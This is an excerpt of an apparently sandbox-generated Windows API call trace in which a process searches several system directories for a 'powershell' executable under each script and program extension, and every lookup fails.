	[0352.590] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.590] SetErrorMode (uMode=0x1) returned 0x1
	[0352.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.590] SetErrorMode (uMode=0x1) returned 0x1
	[0352.590] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.591] SetErrorMode (uMode=0x1) returned 0x1
	[0352.591] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.591] SetErrorMode (uMode=0x1) returned 0x1
	[0352.591] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.591] SetErrorMode (uMode=0x1) returned 0x1
	[0352.591] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.591] SetErrorMode (uMode=0x1) returned 0x1
	[0352.591] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.592] SetErrorMode (uMode=0x1) returned 0x1
	[0352.592] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.592] SetErrorMode (uMode=0x1) returned 0x1
	[0352.592] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.592] SetErrorMode (uMode=0x1) returned 0x1
	[0352.592] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.592] SetErrorMode (uMode=0x1) returned 0x1
	[0352.592] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.593] SetErrorMode (uMode=0x1) returned 0x1
	[0352.593] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.593] SetErrorMode (uMode=0x1) returned 0x1
	[0352.593] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.593] SetErrorMode (uMode=0x1) returned 0x1
	[0352.593] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.593] SetErrorMode (uMode=0x1) returned 0x1
	[0352.593] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.594] SetErrorMode (uMode=0x1) returned 0x1
	[0352.594] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.594] SetErrorMode (uMode=0x1) returned 0x1
	[0352.594] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.594] SetErrorMode (uMode=0x1) returned 0x1
	[0352.594] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.595] SetErrorMode (uMode=0x1) returned 0x1
	[0352.595] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.595] SetErrorMode (uMode=0x1) returned 0x1
	[0352.595] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.595] SetErrorMode (uMode=0x1) returned 0x1
	[0352.595] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.596] SetErrorMode (uMode=0x1) returned 0x1
	[0352.596] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.596] SetErrorMode (uMode=0x1) returned 0x1
	[0352.596] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.596] SetErrorMode (uMode=0x1) returned 0x1
	[0352.596] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.596] SetErrorMode (uMode=0x1) returned 0x1
	[0352.596] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.597] SetErrorMode (uMode=0x1) returned 0x1
	[0352.597] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.597] SetErrorMode (uMode=0x1) returned 0x1
	[0352.597] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.597] SetErrorMode (uMode=0x1) returned 0x1
	[0352.598] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.598] SetErrorMode (uMode=0x1) returned 0x1
	[0352.598] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.598] SetErrorMode (uMode=0x1) returned 0x1
	[0352.598] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.598] SetErrorMode (uMode=0x1) returned 0x1
	[0352.598] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.599] SetErrorMode (uMode=0x1) returned 0x1
	[0352.599] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0352.599] SetErrorMode (uMode=0x1) returned 0x1
	[0352.599] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.599] SetErrorMode (uMode=0x1) returned 0x1
	[0352.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.600] SetErrorMode (uMode=0x1) returned 0x1
	[0352.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.600] SetErrorMode (uMode=0x1) returned 0x1
	[0352.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.600] SetErrorMode (uMode=0x1) returned 0x1
	[0352.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.600] SetErrorMode (uMode=0x1) returned 0x1
	[0352.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.601] SetErrorMode (uMode=0x1) returned 0x1
	[0352.601] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.601] SetErrorMode (uMode=0x1) returned 0x1
	[0352.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.601] SetErrorMode (uMode=0x1) returned 0x1
	[0352.601] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.601] SetErrorMode (uMode=0x1) returned 0x1
	[0352.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.602] SetErrorMode (uMode=0x1) returned 0x1
	[0352.602] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.602] SetErrorMode (uMode=0x1) returned 0x1
	[0352.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.602] SetErrorMode (uMode=0x1) returned 0x1
	[0352.602] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.602] SetErrorMode (uMode=0x1) returned 0x1
	[0352.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.603] SetErrorMode (uMode=0x1) returned 0x1
	[0352.603] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.603] SetErrorMode (uMode=0x1) returned 0x1
	[0352.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.603] SetErrorMode (uMode=0x1) returned 0x1
	[0352.603] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.603] SetErrorMode (uMode=0x1) returned 0x1
	[0352.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.604] SetErrorMode (uMode=0x1) returned 0x1
	[0352.604] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.604] SetErrorMode (uMode=0x1) returned 0x1
	[0352.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.604] SetErrorMode (uMode=0x1) returned 0x1
	[0352.604] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.604] SetErrorMode (uMode=0x1) returned 0x1
	[0352.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.605] SetErrorMode (uMode=0x1) returned 0x1
	[0352.605] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.605] SetErrorMode (uMode=0x1) returned 0x1
	[0352.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.605] SetErrorMode (uMode=0x1) returned 0x1
	[0352.605] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.605] SetErrorMode (uMode=0x1) returned 0x1
	[0352.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.606] SetErrorMode (uMode=0x1) returned 0x1
	[0352.606] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.606] SetErrorMode (uMode=0x1) returned 0x1
	[0352.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.606] SetErrorMode (uMode=0x1) returned 0x1
	[0352.606] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.606] SetErrorMode (uMode=0x1) returned 0x1
